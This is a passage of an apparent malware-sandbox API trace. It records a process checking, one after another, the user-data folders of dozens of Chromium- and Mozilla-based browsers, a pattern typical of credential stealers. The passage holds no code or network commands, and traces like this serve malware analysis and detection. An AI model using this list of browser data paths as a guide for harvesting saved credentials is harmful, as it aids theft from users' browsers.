ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.399] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data", lpFilePart=0x0) returned 0x33 [0189.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.399] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Amigo\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\amigo\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.399] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x39 [0189.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.399] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.399] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data", lpFilePart=0x0) returned 0x3c [0189.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.400] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CocCoc\\Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coccoc\\browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.400] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x34 [0189.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.400] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\chedot\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.400] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3e [0189.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.400] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.400] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x34 [0189.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.401] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Kometa\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\kometa\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.401] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x59 [0189.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.401] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\fenrir inc\\sleipnir5\\setting\\modules\\chromiumviewer"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.401] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x42 [0189.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.401] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\catalinagroup\\citrio\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.402] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x3b [0189.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.402] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Coowon\\Coowon\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\coowon\\coowon\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.402] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x34 [0189.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.402] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\liebao\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\liebao\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.402] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x36 [0189.402] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.402] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QIP Surf\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\qip surf\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.402] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data", lpFilePart=0x0) returned 0x3f [0189.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.403] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Tencent\\QQBrowser\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\tencent\\qqbrowser\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\UCBrowser\\", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\UCBrowser\\", lpFilePart=0x0) returned 0x2e [0189.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.403] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\UCBrowser\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucbrowser"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x35 [0189.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.403] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\orbitum\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.403] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data", lpFilePart=0x0) returned 0x3d [0189.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Sputnik\\Sputnik\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\sputnik\\sputnik\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.404] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x3c [0189.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\uCozMedia\\Uran\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\ucozmedia\\uran\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.404] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x57fef10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x35 [0189.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff3b4) returned 1 [0189.404] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Vivaldi\\User Data" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\vivaldi\\user data"), fInfoLevelId=0x0, lpFileInformation=0x57ff430 | out: lpFileInformation=0x57ff430*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff3b0) returned 1 [0189.565] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.565] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.565] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.565] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.568] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.568] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.568] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.568] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.568] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.569] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.569] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.569] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x57ff378, nSize=0x80 | out: lpBuffer="") returned 0x25 [0189.569] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\", lpFilePart=0x0) returned 0x36 [0189.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\Firefox\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\firefox"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.569] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\", lpFilePart=0x0) returned 0x35 [0189.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\icecat\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\icecat"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.569] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\", lpFilePart=0x0) returned 0x46 [0189.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Moonchild Productions\\Pale Moon\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\moonchild productions\\pale moon"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.570] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\", lpFilePart=0x0) returned 0x38 [0189.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Mozilla\\SeaMonkey\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\mozilla\\seamonkey"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.570] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Flock\\Browser\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Flock\\Browser\\", lpFilePart=0x0) returned 0x34 [0189.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Flock\\Browser\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\flock\\browser"), fInfoLevelId=0x0, lpFileInformation=0x57ff4ac | out: lpFileInformation=0x57ff4ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0189.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x57ff42c) returned 1 [0189.570] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", nBufferLength=0x105, lpBuffer=0x57fef8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\", lpFilePart=0x0) returned 0x2f [0189.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x57ff430) returned 1 [0189.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\K-Meleon\\" (normalized: 